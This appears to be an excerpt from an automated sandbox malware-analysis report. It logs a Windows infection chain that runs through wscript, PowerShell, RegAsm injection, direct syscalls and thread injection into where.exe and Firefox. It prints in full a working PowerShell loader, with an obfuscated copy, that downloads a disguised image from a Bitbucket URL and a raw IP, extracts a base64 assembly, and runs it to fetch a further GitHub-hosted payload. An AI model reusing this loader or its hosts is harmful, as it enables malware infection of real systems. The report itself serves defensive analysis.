        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF626 mov eax, dword ptr fs:[00000030h]5_2_031EF626
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF626 mov eax, dword ptr fs:[00000030h]5_2_031EF626
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF626 mov eax, dword ptr fs:[00000030h]5_2_031EF626
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF626 mov eax, dword ptr fs:[00000030h]5_2_031EF626
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF626 mov eax, dword ptr fs:[00000030h]5_2_031EF626
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF626 mov eax, dword ptr fs:[00000030h]5_2_031EF626
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232619 mov eax, dword ptr fs:[00000030h]5_2_03232619
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322A660 mov eax, dword ptr fs:[00000030h]5_2_0322A660
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322A660 mov eax, dword ptr fs:[00000030h]5_2_0322A660
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03229660 mov eax, dword ptr fs:[00000030h]5_2_03229660
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03229660 mov eax, dword ptr fs:[00000030h]5_2_03229660
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B866E mov eax, dword ptr fs:[00000030h]5_2_032B866E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B866E mov eax, dword ptr fs:[00000030h]5_2_032B866E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03222674 mov eax, dword ptr fs:[00000030h]5_2_03222674
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320C640 mov eax, dword ptr fs:[00000030h]5_2_0320C640
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322C6A6 mov eax, dword ptr fs:[00000030h]5_2_0322C6A6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F4690 mov eax, dword ptr fs:[00000030h]5_2_031F4690
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F4690 mov eax, dword ptr fs:[00000030h]5_2_031F4690
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032266B0 mov eax, dword ptr fs:[00000030h]5_2_032266B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327368C mov eax, dword ptr fs:[00000030h]5_2_0327368C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327368C mov eax, dword ptr fs:[00000030h]5_2_0327368C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327368C mov eax, dword ptr fs:[00000030h]5_2_0327368C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327368C mov eax, dword ptr fs:[00000030h]5_2_0327368C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E76B2 mov eax, dword ptr fs:[00000030h]5_2_031E76B2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E76B2 mov eax, dword ptr fs:[00000030h]5_2_031E76B2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E76B2 mov eax, dword ptr fs:[00000030h]5_2_031E76B2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031ED6AA mov eax, dword ptr fs:[00000030h]5_2_031ED6AA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031ED6AA mov eax, dword ptr fs:[00000030h]5_2_031ED6AA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321D6E0 mov eax, dword ptr fs:[00000030h]5_2_0321D6E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321D6E0 mov eax, dword ptr fs:[00000030h]5_2_0321D6E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032836EE mov eax, dword ptr fs:[00000030h]5_2_032836EE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032836EE mov eax, dword ptr fs:[00000030h]5_2_032836EE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032836EE mov eax, dword ptr fs:[00000030h]5_2_032836EE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032836EE mov eax, dword ptr fs:[00000030h]5_2_032836EE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032836EE mov eax, dword ptr fs:[00000030h]5_2_032836EE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032836EE mov eax, dword ptr fs:[00000030h]5_2_032836EE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032236EF mov eax, dword ptr fs:[00000030h]5_2_032236EF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0326E6F2 mov eax, dword ptr fs:[00000030h]5_2_0326E6F2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0326E6F2 mov eax, dword ptr fs:[00000030h]5_2_0326E6F2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0326E6F2 mov eax, dword ptr fs:[00000030h]5_2_0326E6F2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0326E6F2 mov eax, dword ptr fs:[00000030h]5_2_0326E6F2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032706F1 mov eax, dword ptr fs:[00000030h]5_2_032706F1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032706F1 mov eax, dword ptr fs:[00000030h]5_2_032706F1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AD6F0 mov eax, dword ptr fs:[00000030h]5_2_032AD6F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FB6C0 mov eax, dword ptr fs:[00000030h]5_2_031FB6C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FB6C0 mov eax, dword ptr fs:[00000030h]5_2_031FB6C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FB6C0 mov eax, dword ptr fs:[00000030h]5_2_031FB6C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FB6C0 mov eax, dword ptr fs:[00000030h]5_2_031FB6C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FB6C0 mov eax, dword ptr fs:[00000030h]5_2_031FB6C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FB6C0 mov eax, dword ptr fs:[00000030h]5_2_031FB6C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0322A6C7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322A6C7 mov eax, dword ptr fs:[00000030h]5_2_0322A6C7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B16CC mov eax, dword ptr fs:[00000030h]5_2_032B16CC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B16CC mov eax, dword ptr fs:[00000030h]5_2_032B16CC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B16CC mov eax, dword ptr fs:[00000030h]5_2_032B16CC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B16CC mov eax, dword ptr fs:[00000030h]5_2_032B16CC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AF6C7 mov eax, dword ptr fs:[00000030h]5_2_032AF6C7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032216CF mov eax, dword ptr fs:[00000030h]5_2_032216CF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AB52F mov eax, dword ptr fs:[00000030h]5_2_032AB52F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329F525 mov eax, dword ptr fs:[00000030h]5_2_0329F525
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329F525 mov eax, dword ptr fs:[00000030h]5_2_0329F525

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: amsi64_3292.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3292, type: MEMORYSTR
        .NET source code references suspicious native API functions
        Source: 4.2.powershell.exe.127d3c3a578.1.raw.unpack, Program2.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
        Source: 4.2.powershell.exe.127d3c3a578.1.raw.unpack, Program2.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
        Source: 4.2.powershell.exe.127d3c3a578.1.raw.unpack, Program2.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
        Source: 4.2.powershell.exe.127d3c3a578.1.raw.unpack, Program2.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
        Source: 4.2.powershell.exe.127d3c3a578.1.raw.unpack, Program2.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtClose: Direct from: 0x76EE7B2E
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtClose: Direct from: 0x76EF2B6C
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
        Injects a PE file into a foreign processes
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeSection loaded: NULL target: C:\Windows\SysWOW64\where.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: NULL target: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: NULL target: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\where.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\where.exeThread register set: target process: 5380Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\where.exeThread APC queued: target process: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeJump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1106008Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$ZgBn$Gs$ZgBn$Gg$Zg$v$HM$ZwBz$GQ$ZwBo$HM$Z$Bm$HM$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DE$Mw$0$DE$NQ$n$Cw$I$$n$Gg$d$B0$H$$Og$v$C8$MQ$w$DM$Lg$y$D$$Lg$x$D$$Mg$u$DY$Mg$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$GJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeProcess created: C:\Windows\SysWOW64\where.exe "C:\Windows\SysWOW64\where.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\where.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
